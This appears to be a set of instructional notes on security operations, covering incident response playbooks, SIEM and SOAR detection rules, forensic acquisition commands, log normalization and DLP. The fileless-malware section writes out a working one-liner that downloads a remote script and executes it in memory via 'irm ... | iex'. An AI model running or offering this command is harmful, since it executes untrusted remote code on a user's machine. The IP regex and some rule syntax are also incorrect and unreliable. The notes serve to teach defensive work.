- Incident Response Playbooks and Automation
- Understanding Incident Response Playbooks
- Agent-Based Log Collection
- Security Automation Fundamentals
- Real-World SOAR Integration Example
- Detection Rule Examples
- Email-Based Detection Rule
- Ransomware Detection Rule
- Ransomware Response Playbook Structure
- Playbook Flow for Suspected Ransomware Infection
- Forensic Acquisition Runbook
- Detailed Forensic Collection Steps
- Understanding File Deletion and Recovery
- Windows Event Log Analysis
- SIEM Data Structure and Investigation Flow
- Case Management and Documentation
- Entity Extraction and Enrichment
- Log Parsing and Normalization
- Understanding Log Parsing
- Normalization Process Example
- Fileless Malware Execution
- Windows API for File Operations
- Analyzing Request Patterns
- Malware String Analysis
- SIEM Detection Pipeline
- The Complete Detection Flow
- Data Loss Prevention Integration
- Microsoft Purview DLP
- Alert Tuning and False Positive Reduction
- Array Processing Logic
Incident Response Playbooks and Automation
Understanding Incident Response Playbooks
An incident response playbook is a short, predefined guide that tells teams exactly what to do when a security incident happens. It outlines the steps to detect, contain, investigate, and recover from threats so actions are fast and consistent. By following it, responders avoid confusion and reduce damage by knowing who does what and when.
Playbooks exist on a spectrum ranging from manual processes where human analysts perform every step, to semi-automated workflows where some tasks are manual and others are automated, to fully automated playbooks where the entire response chain executes without human intervention. An example of automation logic would be checking if a hash of an executable matches a known Metasploit hash and automatically triggering isolation of the affected system.
Agent-Based Log Collection
Organizations deploy agents or forwarders by installing them on endpoints to enable log collection. If the installation process requires ten scripts and three commands to be executed, these can be consolidated into a single script. An administrator can then RDP into the machine, run the script, and achieve automated execution of all required setup steps.
Security Automation Fundamentals
Automation is the use of tools or scripts to perform security tasks without manual effort. It reduces human error and speeds up repetitive processes like alert triage or log collection.
SOAR (Security Orchestration, Automation, and Response) connects security tools together, automates actions, and guides analysts through response workflows. It helps teams handle incidents faster and more efficiently.
Real-World SOAR Integration Example
A company's SIEM (like Microsoft Sentinel) detects that a user account is attempting logins from two countries within minutes, triggering an alert. Analysts would normally investigate manually, but the SOAR playbook steps in automatically. It enriches the alert with geo-data, checks recent activity, and quarantines the account if risk is confirmed. In this real-world flow, the SIEM spots the abnormal behavior, and the SOAR acts on it instantly.
Detection Rule Examples
Email-Based Detection Rule
A rule can be configured to detect suspicious email activity using conditions such as checking if the email sender is unique AND the email has recipients at more than two different domains AND the mean time between sends is three minutes. Upon confirmation, the system can send a verification email to the user and escalate the alert to the sales department for review.
rule: if $email.sender="unique" AND $email.recipients > 2@ AND mean.time = "3min"Ransomware Detection Rule
An alert titled Suspected Ransomware Infection triggers based on specific conditions. The rule checks if the file extension equals ".medusa" AND the action indicates file changes equal TRUE AND the number of changed files exceeds 100. The logs would show data organized by host, filename, and extension. For example, you might see entries showing dev-81 with files like document.exe and screenshot1.exe, dev-01 with lovepdf.exe, and critically dev-81 with monthlyreportQ2 now having the .medusa extension indicating encryption.
rule: if $file.extension=".medusa" AND $action.change.file=TRUE AND change.file.number > 100Ransomware Response Playbook Structure
Playbook Flow for Suspected Ransomware Infection
The playbook begins when an Alert for Suspicious Encryption Activity triggers the automated response. Node 1 confirms whether ransomware is present. If Yes, the flow continues; if No, the alert is closed or monitored for further activity.
Node 2 executes endpoint isolation through the XDR platform. The agent installed on the machine has access to the device with higher privileges and executes the isolation action remotely.
Node 3 notifies leadership and the IR Lead using API keys or OAuth2 authentication which allows the system to send emails automatically without manual intervention.
Node 4 triggers the forensics workflow to begin evidence collection and analysis.
Node 5 presents the decision point where the team must choose between containment strategies or moving to eradication.
Forensic Acquisition Runbook
Detailed Forensic Collection Steps
The runbook for Forensic Acquisition of a Compromised Host provides step-by-step technical instructions. Step 1 requires logging into the isolated forensic VLAN to ensure network separation. Step 2 stops network services by running sudo systemctl stop network-manager to prevent any network communication during acquisition. Step 3 acquires the disk image using the command sudo dd if=/dev/sda of=/evidence/host.img bs=4M to create a bit-by-bit copy. Step 4 calculates integrity hashes with sha256sum host.img > host.img.sha256 to ensure evidence integrity. Step 5 exports the memory dump using sudo lime -o /evidence/memdump.lime to capture volatile data. Step 6 collects additional volatile data using commands like ps, netstat, lsof, and autoruns, which can later be analyzed with vol.py for memory forensics. Step 7 tags all evidence and moves it to the secure evidence repository for preservation.
Understanding File Deletion and Recovery
When a file like reportQ3.pdf is deleted from disk by a normal user, it moves to the recycle bin. When deleted from the recycle bin, the user believes the file is gone forever. However, during disk image acquisition, the bit-by-bit copy of the disk can recover this data because deletion doesn't immediately overwrite the actual file content.
The file system uses pointers to track file locations. Pointer @1 might point to reportQ1.pdf, pointer @2 to reportQ2.pdf, and pointer @3 originally pointed to reportQ3.pdf. When reportQ3.pdf is deleted, only the pointer is removed, marking that disk space as free. The disk might show 1GB increasing to 1.2GB free space, but the binary data representing reportQ3.pdf and document.txt still exists on the physical disk until overwritten.
Windows Event Log Analysis
Windows event logs stored in security.evtx files contain critical security events. Investigators focus on specific EventCodes including 4625 for failed logons, 4624 for successful logons, 4768 for Kerberos authentication ticket requests, 4769 for Kerberos service ticket requests, and 4634 for logoffs. This filtering helps identify authentication-related suspicious activity.
wineventlogs -> file "security.evtx" -> EventCode IN ("4625", "4624", "4768", "4769", "4634")SIEM Data Structure and Investigation Flow
SIEM platforms organize data using field and value pairs. For example, the IP field might contain value 12.12.12.12, the hash field contains a file hash like hckhaepfvgerhfiopqFHJERO, and the eventid field contains values like 6578. When an alert triggers an investigation, analysts use the SIEM to identify missing points in the timeline. They may need to acquire disk images and memory dumps, then analyze them using tools like FTK for disk forensics and vol.py for memory analysis.
Case Management and Documentation
Analysts can add notes, update executive summaries, and rely on the case wall for a chronological record of all actions, including automated playbooks. This documentation trail ensures accountability and supports post-incident review.
Entity Extraction and Enrichment
Entities like IPs, hostnames, usernames, file hashes, and domains are automatically extracted and normalized through Marketplace integrations, enabling quick enrichment and correlation with threat intelligence from sources like VirusTotal and Mandiant, reducing manual configuration and accelerating investigation and response.
Log Parsing and Normalization
Understanding Log Parsing
Log parsing in SIEM converts raw logs into a standardized format, making the data easier to analyze. During the normalization phase, data from different log sources is aligned and categorized into uniform fields.
Normalization Process Example
When focusing on IP addresses across different log sources, each source may use different field names. Windows event logs after parsing might use ip.addr, Sysmon logs might use ip.src, and email logs might use ipsrc. The normalization phase unifies all these variations into a single standardized field name like source.ipaddress. This allows analysts to query one field name regardless of the original log source.
IP addresses can be identified using regex patterns matching the format of one to three digits, dot, one to three digits, dot, one to three digits, dot, one to three digits. For finding MD5 hashes in files, you can use grep with the pattern matching 32 hexadecimal characters.
IP address = ([1-3].[1-3].[1-3].[1-3])
grep -i "[0-9a-f]{32}" yourfile.txtWhen the source.ipaddress field is created through normalization, it can contain IP address information from four different types of original log sources, making correlation significantly easier.
Fileless Malware Execution
Consider the PowerShell command that uses Invoke-RestMethod and Invoke-Expression together. This command silently downloads a remote script from the given URL and immediately executes it in memory. Because it uses irm (Invoke-RestMethod) piped into iex (Invoke-Expression), nothing is written to disk. This technique is commonly used by attackers to run payloads directly and should never be executed unless the source is fully trusted.
irm https://get.activated.win/ | iexWindows API for File Operations
The CreateFile Windows API function demonstrates how applications interact with files at the system level. This function takes parameters including lpFileName for the file path, dwDesiredAccess for access rights, dwShareMode for sharing permissions, lpSecurityAttributes for security settings, dwCreationDisposition for creation behavior, dwFlagsAndAttributes for file attributes, and hTemplateFile for template file handles. Understanding these API calls helps investigators analyze how malware interacts with the file system.
HANDLE CreateFile(
LPCWSTR lpFileName,
DWORD dwDesiredAccess,
DWORD dwShareMode,
LPSECURITY_ATTRIBUTES lpSecurityAttributes,
DWORD dwCreationDisposition,
DWORD dwFlagsAndAttributes,
HANDLE hTemplateFile
);Analyzing Request Patterns
In Splunk, you can analyze the last one hour to identify which IP address made the most requests. Understanding traffic patterns helps identify potential denial of service attacks, scanning activity, or data exfiltration attempts.
Malware String Analysis
Using the strings command against a malicious executable and piping it through grep searching for CreateRemoteThread can reveal whether the malware uses process injection techniques. CreateRemoteThread is a Windows API commonly used in malicious code injection.
strings mal.exe | grep -i "CreateRemoteThread"SIEM Detection Pipeline
The Complete Detection Flow
The SIEM detection pipeline follows a structured flow from Collection through Processing to Information to Detection and finally Alert generation. Collection gathers data from endpoints, servers, networks, and security tools. Processing involves parsing and normalization to standardize the data. Information represents the easy-to-use format with correlation based on unified field names. Detection applies rules or machine learning models to identify threats. As a result of detection, an alert is generated containing a title, description, and the detection query used.
Data Loss Prevention Integration
Data Classification involves tagging sensitive information, such as marking PDF files as secret, public, private, or confidential, and then applying actions based on detection rules or machine learning models. For example, a rule might state that if a document is tagged as secret AND email recipients are NOT in the same domain, the action should be to block the transmission and send a notification to the SOC.
An example scenario shows an email being sent from tarq@josales.com to multiple recipients including semo@josales.com, laith@josales.com, hanna@josales.com, sama@josales.com, and critically saba@johr.com who is outside the company domain. This would trigger the DLP rule.
rule: tag=secret AND email.recipients NOT in $same.domain -> action -> block and send a notification to the SOCMicrosoft Purview DLP
In Microsoft Purview, DLP (Data Loss Prevention) is a compliance solution that uses policies to identify, monitor, and automatically protect an organization's sensitive information across various locations like Microsoft 365, endpoints, and cloud apps. It helps prevent accidental or unauthorized sharing of data to meet regulatory requirements and safeguard intellectual property. Banking institutions commonly use regex patterns to identify sensitive data like account numbers and routing information.
Alert Tuning and False Positive Reduction
In the SOC workflow, Level 1 analysts encounter false positives and must add comments explaining why the alert was incorrectly triggered. These cases go under tuning review where Detection Engineers edit the rule to reduce false positives. This continuous improvement cycle ensures detection rules become more accurate over time.
Array Processing Logic
When processing arrays of data elements, systems iterate through each element performing specified actions. Given an array containing data0, data1, data2, data3, and data4, the system processes data0 with its action, then data1 with its action, continuing through data2 and subsequent elements until reaching the end of the array and finishing the processing loop.
[data0, data1, data2, data3, data4] -> data0 -> action, data1 -> action, data2 -> action [complete] -> finish